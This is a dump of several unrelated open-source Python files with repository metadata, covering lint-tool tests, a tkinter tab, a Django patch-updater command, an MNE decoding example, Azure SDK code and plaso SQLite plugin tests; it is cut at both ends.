cnn_background = Database(path_background).connect_db()
http = HttpRequest(path_http)
runcase = Runcase()
if runcase.run_Case(http,cnn_background, path_test_data) == False:
print("测试失败")
else:
print("测试成功")
|
[
"610077670@qq.com"
] |
610077670@qq.com
|
4aaa44a645f108b0de973b6f7119085e4cfadb95
|
45da48ae0a87f4bb27409bfe2e947b29a2d4a0d0
|
/znake/znake/test/test_tools.py
|
314367afe4e3c68ddcd06ff272e50992230a2700
|
[
"Apache-2.0"
] |
permissive
|
per-bohlin/opensourcelib
|
3923165982ae1b2c78602a3485684ded75c28c36
|
e48427fd0b5d87ea21484e85d2575c8b8879b9a3
|
refs/heads/master
| 2020-05-21T21:34:15.112527
| 2019-05-11T16:57:58
| 2019-05-11T16:57:58
| 186,156,987
| 0
| 0
|
NOASSERTION
| 2019-05-11T16:34:39
| 2019-05-11T16:34:39
| null |
UTF-8
|
Python
| false
| false
| 1,495
|
py
|
from unittest import TestCase
from unittest.mock import Mock
from znake.tools import _render_isort, _render_yapf, render_flake8_check, render_pydocstyle_check
class TestToolsRenderCommandLine(TestCase):
@staticmethod
def get_ctx(tool):
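        # Mock invoke context: two packages under test and two flags for the given tool.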
ctx = Mock()
ctx.znake.static.packages = ['my_package', 'my_other_package']
getattr(ctx.znake.static, tool).flags = ['--my-flag', '--my-other-flag']
return ctx
def test_flake8(self):
ctx = self.get_ctx('flake8')
result = render_flake8_check(ctx)
assert 'flake8' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_isort(self):
ctx = self.get_ctx('isort')
result = _render_isort(ctx, '--EXTRA')
assert 'isort --recursive --EXTRA' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_pydocstyle(self):
ctx = self.get_ctx('pydocstyle')
result = render_pydocstyle_check(ctx)
assert 'pydocstyle' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_yapf(self):
ctx = self.get_ctx('yapf')
result = _render_yapf(ctx, '--EXTRA')
assert 'yapf -p --recursive --EXTRA' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
|
[
"per.bohlin@zenterio.com"
] |
per.bohlin@zenterio.com
|
a704c7629480555065e3767614ff66caab4f1096
|
bacabd549ca67204bd3ec22f0f9020a4287aa6c5
|
/ui/dispatcher_tab.py
|
87144b13fd78c80105599462550a5804ad38e78a
|
[] |
no_license
|
gladiopeace/csc-manager-ui
|
5b8b642695742e906c779bbb18759084ed4791a9
|
ec7660b91aed0f8512183b147cb49994c925bc41
|
refs/heads/master
| 2023-06-26T17:22:31.434146
| 2021-07-23T13:32:33
| 2021-07-23T13:32:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
import logging
import tkinter
class DispatcherTab(tkinter.Frame):
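    # A tab frame that fires optional callbacks when the tab becomes visible (in) or hidden (out).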
def __init__(self, parent, in_callback=None, out_callback=None):
self.logger = logging.getLogger(f'{self.__class__.__name__}', )
self.parent = parent
self.in_callback = in_callback
self.out_callback = out_callback
tkinter.Frame.__init__(self, parent)
def on_visible_in(self, parent, id, str):
self.logger.debug("on_visible_in: parent=%s, ID=%s, str=%s", parent, id, str)
if self.in_callback is not None:
self.in_callback()
def on_visible_out(self, parent, id, str):
self.logger.debug("on_visible_in: parent=%s, ID=%s, str=%s", parent, id, str)
if self.out_callback is not None:
self.out_callback()
|
[
"bohdan.shlikhutka@gmail.com"
] |
bohdan.shlikhutka@gmail.com
|
fa9a485adbdcf00e88ce9e816a00db9e0b6e9d2a
|
bdb1c323968cd9d5441a187a29ed7e25a2e4f07e
|
/cp0/people/management/commands/UPdate.py
|
e42d81d517445ea10d217cff37e1280e3c12f9e1
|
[] |
no_license
|
liangzhaowang/automation_system
|
beee351dd9f09a51e2b81617ac5bee63023ea9b8
|
f77ef433c2366253dc9d9fdb7c54911cb38ed3e8
|
refs/heads/master
| 2022-02-19T11:07:44.047000
| 2019-09-23T02:16:00
| 2019-09-23T02:16:00
| 209,732,359
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
from django.core.management.base import BaseCommand
import json
import time
from people.models import bxtp_m
from people.models import bxtp_o
from Patches import Patches
from people.models import bkc_m
from people.models import bkc_o
from data.models import Task
class Command(BaseCommand):
def handle(self,*args, **options):
while True:
options_time = time.strftime("%Y-%m-%d %H:%M:%S")
print "======================================="
print "Now time is: {0}".format(str(options_time))
self.checkdata()
print "Please wait 30 seconds for next update "
print "======================================="
time.sleep(30)
def checkdata(self):
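        # Backfill empty eb build links from each task's test config, then
        # refresh owner/subject/status/track for every tracked patch.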
Bkc_m = bkc_m.objects.all()
Bkc_o = bkc_o.objects.all()
for i in Bkc_m:
id = i.id
if i.eb =='':
tasks_id = i.task
if tasks_id:
tasks = Task.objects.get(id=tasks_id)
config_id = str(tasks.test_config)
if (json.load(open("./data/data/test_configs/" + config_id)).has_key('base_build')):
new_eb = "https://buildbot.sh.intel.com/absp/builders/bxtp_ivi_m-engineering/builds/"+json.load(open("./data/data/test_configs/" + config_id))['build'][0]
print "update eblink({0}).subject to {1}".format(str(i.eb), new_eb)
bkc_m.objects.filter(id=id).update(eb=new_eb)
for i in Bkc_o:
id = i.id
if i.eb =='':
tasks_id = i.task
if tasks_id:
tasks = Task.objects.get(id=tasks_id)
config_id = str(tasks.test_config)
if (json.load(open("./data/data/test_configs/" + config_id)).has_key('base_build')):
new_eb = "https://buildbot.sh.intel.com/absp/builders/master-engineering/builds/"+json.load(open("./data/data/test_configs/" + config_id))['build'][0]
print "update eblink({0}).subject to {1}".format(str(i.eb), new_eb)
bkc_o.objects.filter(id=id).update(eb=new_eb)
all = bxtp_m.objects.all()
for i in all:
id = i.id
data = i.patch.split("/")[5]
p = Patches(data)
if len(p.content):
owner = str(p.owner)
subject = str(p.subject)
status = str(p.status)
track = str(p.track_id)
if i.owner != owner:
print "update patch({0}).owner to {1}".format(str(i.id),owner)
bxtp_m.objects.filter(id=id).update(owner=owner)
if i.subject != subject:
print "update patch({0}).subject to {1}".format(str(i.id),subject)
bxtp_m.objects.filter(id=id).update(subject=subject)
if i.status != status:
print "update patch({0}).status to {1}".format(str(i.id),status)
bxtp_m.objects.filter(id=id).update(status=status)
if i.track != track:
print "update patch({0}).track to {1}".format(str(i.id),track)
bxtp_m.objects.filter(id=id).update(track=track)
else:
print 'Patch_M(%d) error' % id
alls = bxtp_o.objects.all()
for i in alls:
id = i.id
data = i.patch.split("/")[5]
p = Patches(data)
if len(p.content):
owner = str(p.owner)
subject = str(p.subject)
status = str(p.status)
track = str(p.track_id)
if i.owner != owner:
print "update patch({0}).owner to {1}".format(str(i.id),owner)
bxtp_o.objects.filter(id=id).update(owner=owner)
if i.subject != subject:
print "update patch({0}).subject to {1}".format(str(i.id),subject)
bxtp_o.objects.filter(id=id).update(subject=subject)
if i.status != status:
print "update patch({0}).status to {1}".format(str(i.id),status)
bxtp_o.objects.filter(id=id).update(status=status)
if i.track != track:
print "update patch({0}).track to {1}".format(str(i.id),track)
bxtp_o.objects.filter(id=id).update(track=track)
else:
print 'Patch_O(%d) error' % id
|
[
"zhaowangx.liang@intel.com"
] |
zhaowangx.liang@intel.com
|
58204fab93085a4af72d6ba4ffef814213fd27a0
|
a9243f735f6bb113b18aa939898a97725c358a6d
|
/0.14/_downloads/plot_decoding_time_generalization_conditions.py
|
98b29ed251d7f7287579cc2c0e3049cdb118be34
|
[] |
permissive
|
massich/mne-tools.github.io
|
9eaf5edccb4c35831400b03278bb8c2321774ef2
|
95650593ba0eca4ff8257ebcbdf05731038d8d4e
|
refs/heads/master
| 2020-04-07T08:55:46.850530
| 2019-09-24T12:26:02
| 2019-09-24T12:26:02
| 158,233,630
| 0
| 0
|
BSD-3-Clause
| 2018-11-19T14:06:16
| 2018-11-19T14:06:16
| null |
UTF-8
|
Python
| false
| false
| 2,991
|
py
|
"""
=========================================================================
Decoding sensor space data with generalization across time and conditions
=========================================================================
This example runs the analysis described in [1]_. It illustrates how one can
fit a linear classifier to identify a discriminatory topography at a given time
instant and subsequently assess whether this linear model can accurately
predict all of the time samples of a second set of conditions.
References
----------
.. [1] King & Dehaene (2014) 'Characterizing the dynamics of mental
representations: the temporal generalization method', Trends In
Cognitive Sciences, 18(4), 203-210. doi: 10.1016/j.tics.2014.01.002.
"""
# Authors: Jean-Remi King <jeanremi.king@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import numpy as np
import mne
from mne.datasets import sample
from mne.decoding import GeneralizationAcrossTime
print(__doc__)
# Preprocess data
data_path = sample.data_path()
# Load and filter data, set up epochs
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
events_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
raw = mne.io.read_raw_fif(raw_fname, preload=True)
picks = mne.pick_types(raw.info, meg=True, exclude='bads') # Pick MEG channels
raw.filter(1, 30, method='fft') # Band pass filtering signals
events = mne.read_events(events_fname)
event_id = {'AudL': 1, 'AudR': 2, 'VisL': 3, 'VisR': 4}
decim = 2 # decimate to make the example faster to run
epochs = mne.Epochs(raw, events, event_id, -0.050, 0.400, proj=True,
picks=picks, baseline=None, preload=True,
reject=dict(mag=5e-12), decim=decim, verbose=False)
# We will train the classifier on all left visual vs auditory trials
# and test on all right visual vs auditory trials.
# In this case, because the test data is independent from the train data,
# we test the classifier of each fold and average the respective predictions.
# Define events of interest
triggers = epochs.events[:, 2]
viz_vs_auditory = np.in1d(triggers, (1, 2)).astype(int)
gat = GeneralizationAcrossTime(predict_mode='mean-prediction', n_jobs=1)
# For our left events, which ones are visual?
viz_vs_auditory_l = (triggers[np.in1d(triggers, (1, 3))] == 3).astype(int)
# To make scikit-learn happy, we converted the bool array to integers
# in the same line. This results in an array of zeros and ones:
print("The unique classes' labels are: %s" % np.unique(viz_vs_auditory_l))
gat.fit(epochs[('AudL', 'VisL')], y=viz_vs_auditory_l)
# For our right events, which ones are visual?
viz_vs_auditory_r = (triggers[np.in1d(triggers, (2, 4))] == 4).astype(int)
gat.score(epochs[('AudR', 'VisR')], y=viz_vs_auditory_r)
gat.plot(title="Temporal Generalization (visual vs auditory): left to right")
|
[
"larson.eric.d@gmail.com"
] |
larson.eric.d@gmail.com
|
05c2a6863ff170102ac029bc54b72165cc024208
|
f66b8a4d5d2f9f9faeb23a2bbbf6524ec49b2051
|
/surreal/__init__.py
|
2d52593edffe3efb913070aa7a4219fbe7fb3203
|
[
"Apache-2.0"
] |
permissive
|
ducandu/surreal
|
237f4188ba270bab7495cb782ed10ee463fe78a7
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
refs/heads/master
| 2020-08-01T14:10:00.327798
| 2019-11-09T15:32:13
| 2019-11-09T15:32:13
| 211,018,247
| 6
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,532
|
py
|
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from surreal.version import __version__
from surreal.makeable import Makeable
from surreal.config import Config
if "SURREAL_HOME" in os.environ:
SURREAL_HOME = os.environ.get("SURREAL_HOME")
else:
SURREAL_HOME = os.path.expanduser('~')
SURREAL_HOME = os.path.join(SURREAL_HOME, ".surreal/")
PATH_EPISODE_LOGS = SURREAL_HOME + "episodes/"
PATH_PREPROCESSING_LOGS = SURREAL_HOME + "preprocessing/"
PATH_SUMMARIES = SURREAL_HOME + "summaries/"
# Create dirs if necessary:
for dir in [SURREAL_HOME, PATH_EPISODE_LOGS, PATH_PREPROCESSING_LOGS, PATH_SUMMARIES]:
if not os.path.exists(dir):
try:
os.makedirs(dir)
except OSError:
pass
__all__ = ["__version__", "Config", "Makeable",
"SURREAL_HOME", "PATH_EPISODE_LOGS", "PATH_PREPROCESSING_LOGS", "PATH_SUMMARIES"
]
|
[
"svenmika1977@gmail.com"
] |
svenmika1977@gmail.com
|
0adbdd2bd8d43634f5c96ccc4a3c8740c82a3216
|
de4da7c45581f72adaf8e328a89cb3d57fe3613f
|
/appengine/olamundo/sorteio.py
|
a6f9e22632289da4d7a3116e0e402b2005a1840c
|
[] |
no_license
|
ramalho/propython
|
2469be7492554762d05f9b0ce5c0dc3a51bd3a18
|
76c2b52755e08d49929cdc2a523db72735240e72
|
refs/heads/master
| 2022-06-01T22:51:07.659074
| 2022-05-22T18:22:21
| 2022-05-22T18:22:21
| 140,458
| 39
| 13
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 872
|
py
|
# coding: utf-8
from random import shuffle
def parear(nomes, embaralhar=True):
    u'''Given a list of names, generate a list of ordered pairs of
    names, where:
    - each name appears once and only once in each position
    - if a pair a, b exists, the pair b, a will not exist
    Examples:
    >>> parear(['a', 'b'], embaralhar=False)
    [('a', 'b'), ('b', 'a')]
    >>> parear(['a', 'b', 'c'], embaralhar=False)
    [('a', 'b'), ('b', 'c'), ('c', 'a')]
    '''
    if embaralhar:
        shuffle(nomes)  # random.shuffle shuffles in place and returns None
    primeiro = nomes[0]
    pares = []
    while len(nomes) > 1:
        pares.append((nomes.pop(0), nomes[0]))
    pares.append((nomes.pop(0), primeiro))  # close the cycle back to the first name
    return pares
if __name__=='__main__':
from doctest import testmod
testmod()
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
c79903a6216c94eb3633b54c28d4bdfc5e67a99e
|
fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd
|
/tools/chrome_proxy/integration_tests/chrome_proxy_pagesets/pass_through.py
|
cc1d267d32fd0971958e46cfd6e27da2af5628b2
|
[
"LGPL-2.0-or-later",
"BSD-3-Clause",
"Apache-2.0",
"LGPL-2.0-only",
"MIT",
"LicenseRef-scancode-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.1-only"
] |
permissive
|
wzyy2/chromium-browser
|
2644b0daf58f8b3caee8a6c09a2b448b2dfe059c
|
eb905f00a0f7e141e8d6c89be8fb26192a88c4b7
|
refs/heads/master
| 2022-11-23T20:25:08.120045
| 2018-01-16T06:41:26
| 2018-01-16T06:41:26
| 117,618,467
| 3
| 2
|
BSD-3-Clause
| 2022-11-20T22:03:57
| 2018-01-16T02:09:10
| null |
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from common.chrome_proxy_shared_page_state import ChromeProxySharedPageState
from telemetry.page import page as page_module
from telemetry import story
class PassThroughPage(page_module.Page):
"""
A test page for the chrome proxy pass-through tests.
"""
def __init__(self, url, page_set):
super(PassThroughPage, self).__init__(url=url, page_set=page_set,
shared_page_state_class=ChromeProxySharedPageState)
def RunNavigateSteps(self, action_runner):
super(PassThroughPage, self).RunNavigateSteps(action_runner)
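    # Re-request the page with Chrome-Proxy-Accept-Transform: identity so the
    # proxy returns the untransformed (pass-through) response.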
action_runner.ExecuteJavaScript('''
(function() {
var request = new XMLHttpRequest();
request.open("GET", {{ url }});
request.setRequestHeader("Chrome-Proxy-Accept-Transform", "identity");
request.send(null);
})();''', url=self.url)
action_runner.Wait(1)
class PassThroughStorySet(story.StorySet):
""" Chrome proxy test sites """
def __init__(self):
super(PassThroughStorySet, self).__init__()
urls_list = [
'http://check.googlezip.net/image.png',
]
for url in urls_list:
self.AddStory(PassThroughPage(url, self))
|
[
"jacob-chen@iotwrt.com"
] |
jacob-chen@iotwrt.com
|
e056bd156b04aa2a41d8cfda5e58af59dbed6b8c
|
4c514345b4759ed4d17f48565ae66dbd7313a0e8
|
/database/match_query.py
|
5e7c6e4ee818c1e183fa2b609979a449e1133e02
|
[
"MIT"
] |
permissive
|
csteward24/the-blue-alliance
|
a6f193176b5c3f3eadb73126d14d06ce299c4185
|
cb3c5ce9078983306e6c83067ae62f5848ffe290
|
refs/heads/master
| 2020-12-11T05:45:15.029275
| 2016-03-11T19:49:32
| 2016-03-11T19:49:32
| 53,530,477
| 1
| 0
| null | 2016-03-09T20:45:46
| 2016-03-09T20:45:46
| null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
from google.appengine.ext import ndb
from database.database_query import DatabaseQuery
from models.event import Event
from models.match import Match
class EventMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'event_matches_{}' # (event_key)
def __init__(self, event_key):
self._query_args = (event_key, )
@ndb.tasklet
def _query_async(self):
event_key = self._query_args[0]
matches = yield Match.query(Match.event == ndb.Key(Event, event_key)).fetch_async()
raise ndb.Return(matches)
class TeamEventMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'team_event_matches_{}_{}' # (team_key, event_key)
def __init__(self, team_key, event_key):
self._query_args = (team_key, event_key, )
@ndb.tasklet
def _query_async(self):
team_key = self._query_args[0]
event_key = self._query_args[1]
matches = yield Match.query(
Match.team_key_names == team_key,
Match.event == ndb.Key(Event, event_key)).fetch_async()
raise ndb.Return(matches)
class TeamYearMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'team_year_matches_{}_{}' # (team_key, year)
def __init__(self, team_key, year):
self._query_args = (team_key, year, )
@ndb.tasklet
def _query_async(self):
team_key = self._query_args[0]
year = self._query_args[1]
matches = yield Match.query(
Match.team_key_names == team_key,
Match.year == year).fetch_async()
raise ndb.Return(matches)
|
[
"fang.eugene@gmail.com"
] |
fang.eugene@gmail.com
|
47489d28c2824bf881262a0cb690632b0f06a466
|
6eb56f2e3f14f2373be07fe95b1c6fedf1e2d49f
|
/month04/Django/my_django_test/my_test_site/my_test_site/wsgi.py
|
6f99386c8bf33243c58777fcefe3b43edecaa629
|
[
"Apache-2.0"
] |
permissive
|
chaofan-zheng/python_leanring_code
|
fe22b0370cadebf7456477269aff4a35cef0eb41
|
0af44ff39b9ded2c1d2cc96c6d356d21170ac04d
|
refs/heads/main
| 2023-02-28T07:56:46.457552
| 2021-02-10T15:08:33
| 2021-02-10T15:08:33
| 323,584,115
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for my_test_site project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'my_test_site.settings')
application = get_wsgi_application()
|
[
"417355570@qq.com"
] |
417355570@qq.com
|
d70c588617cd936f303f45bd05a8f14dd95db981
|
9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb
|
/sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2022_05_02_preview/operations/_trusted_access_roles_operations.py
|
63b63ca700ec5026c217f4203ddfdc330e525f96
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
openapi-env-test/azure-sdk-for-python
|
b334a2b65eeabcf9b7673879a621abb9be43b0f6
|
f61090e96094cfd4f43650be1a53425736bd8985
|
refs/heads/main
| 2023-08-30T14:22:14.300080
| 2023-06-08T02:53:04
| 2023-06-08T02:53:04
| 222,384,897
| 1
| 0
|
MIT
| 2023-09-08T08:38:48
| 2019-11-18T07:09:24
|
Python
|
UTF-8
|
Python
| false
| false
| 7,294
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(location: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-05-02-preview"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/locations/{location}/trustedAccessRoles",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"location": _SERIALIZER.url("location", location, "str", min_length=1),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class TrustedAccessRolesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2022_05_02_preview.ContainerServiceClient`'s
:attr:`trusted_access_roles` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, location: str, **kwargs: Any) -> Iterable["_models.TrustedAccessRole"]:
"""List supported trusted access roles.
List supported trusted access roles.
:param location: The name of Azure region. Required.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TrustedAccessRole or the result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.containerservice.v2022_05_02_preview.models.TrustedAccessRole]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-05-02-preview"))
cls: ClsType[_models.TrustedAccessRoleListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TrustedAccessRoleListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/locations/{location}/trustedAccessRoles"
}
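# Illustrative usage sketch (not part of the generated module; the region and
# subscription id below are placeholders):
#
#   from azure.identity import DefaultAzureCredential
#   from azure.mgmt.containerservice import ContainerServiceClient
#
#   client = ContainerServiceClient(DefaultAzureCredential(), "<subscription-id>")
#   for role in client.trusted_access_roles.list("eastus"):
#       print(role.name)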
|
[
"noreply@github.com"
] |
openapi-env-test.noreply@github.com
|
52e6250f9fd41a90fb895ac16801170303863407
|
6be29c75fe23bf38ac2df4125242e767fb37d41c
|
/tests/parsers/sqlite_plugins/interface.py
|
c0f3af0d7986a8e2dc78f12799da84559dca1a96
|
[
"Apache-2.0"
] |
permissive
|
Laxman-SM/plaso
|
579c7954b2622368427740e2b5687bf2efe249e7
|
bec7b974ec9c2967be58fc704afca936591e46d3
|
refs/heads/master
| 2021-01-22T05:32:59.383909
| 2017-05-26T04:15:29
| 2017-05-26T04:15:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,497
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the SQLite plugin interface."""
import sys
import unittest
from plaso.containers import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import sqlite
from plaso.parsers.sqlite_plugins import interface
from tests import test_lib as shared_test_lib
from tests.parsers.sqlite_plugins import test_lib
class TestSQLitePlugin(interface.SQLitePlugin):
"""Convenience class for a test SQLite plugin."""
NAME = u'test'
QUERIES = [(
u'SELECT Field1, Field2, Field3 FROM MyTable', u'ParseMyTableRow')]
REQUIRED_TABLES = frozenset([u'MyTable'])
SCHEMAS = [
{u'MyTable':
u'CREATE TABLE "MyTable" ( `Field1` TEXT, `Field2` INTEGER, '
u'`Field3` BLOB )'}]
def __init__(self):
"""Initializes SQLite plugin."""
super(TestSQLitePlugin, self).__init__()
self.results = []
def ParseMyTableRow(self, parser_mediator, row, **unused_kwargs):
"""Parses a MyTable row.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
row: The row resulting from the query.
"""
file_entry = parser_mediator.GetFileEntry()
path_spec = file_entry.path_spec
location = path_spec.location
from_wal = location.endswith(u'-wal')
# Note that pysqlite does not accept a Unicode string in row['string'] and
# will raise "IndexError: Index must be int or string".
# Also, Field3 needs to be converted to a string if Python 2 is used
# because it is a read-write buffer.
field3 = row['Field3']
if sys.version_info[0] < 3:
field3 = str(field3)
self.results.append(((row['Field1'], row['Field2'], field3), from_wal))
event = time_events.TimestampEvent(
timelib.Timestamp.NONE_TIMESTAMP, eventdata.EventTimestamp.NOT_A_TIME,
data_type=u'fake')
event.field1 = row['Field1']
event.field2 = row['Field2']
event.field3 = field3
    event.from_wal = from_wal
parser_mediator.ProduceEvent(event)
class SQLiteInterfaceTest(test_lib.SQLitePluginTestCase):
"""Tests for the SQLite plugin interface."""
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db-wal'])
def testProcessWithWAL(self):
"""Tests the Process function on a database with WAL file."""
plugin_object = TestSQLitePlugin()
cache = sqlite.SQLiteCache()
wal_file = self._GetTestFilePath([u'wal_database.db-wal'])
self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
expected_results = [
((u'Committed Text 1', 1, b'None'), False),
((u'Committed Text 2', 2, b'None'), False),
((u'Deleted Text 1', 3, b'None'), False),
((u'Committed Text 3', 4, b'None'), False),
((u'Committed Text 4', 5, b'None'), False),
((u'Deleted Text 2', 6, b'None'), False),
((u'Committed Text 5', 7, b'None'), False),
((u'Committed Text 6', 8, b'None'), False),
((u'Committed Text 7', 9, b'None'), False),
((u'Unhashable Row 1', 10, b'Binary Text!\x01\x02\x03'), False),
((u'Modified Committed Text 3', 4, b'None'), True),
((u'Unhashable Row 2', 11, b'More Binary Text!\x01\x02\x03'), True),
((u'New Text 1', 12, b'None'), True),
((u'New Text 2', 13, b'None'), True)]
self.assertEqual(expected_results, plugin_object.results)
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
def testProcessWithoutWAL(self):
"""Tests the Process function on a database without WAL file."""
plugin_object = TestSQLitePlugin()
cache = sqlite.SQLiteCache()
self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache)
expected_results = [
((u'Committed Text 1', 1, b'None'), False),
((u'Committed Text 2', 2, b'None'), False),
((u'Deleted Text 1', 3, b'None'), False),
((u'Committed Text 3', 4, b'None'), False),
((u'Committed Text 4', 5, b'None'), False),
((u'Deleted Text 2', 6, b'None'), False),
((u'Committed Text 5', 7, b'None'), False),
((u'Committed Text 6', 8, b'None'), False),
((u'Committed Text 7', 9, b'None'), False),
((u'Unhashable Row 1', 10, b'Binary Text!\x01\x02\x03'), False)]
self.assertEqual(expected_results, plugin_object.results)
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db-wal'])
def testSchemaMatching(self):
"""Tests the Schema matching capabilities."""
plugin_object = TestSQLitePlugin()
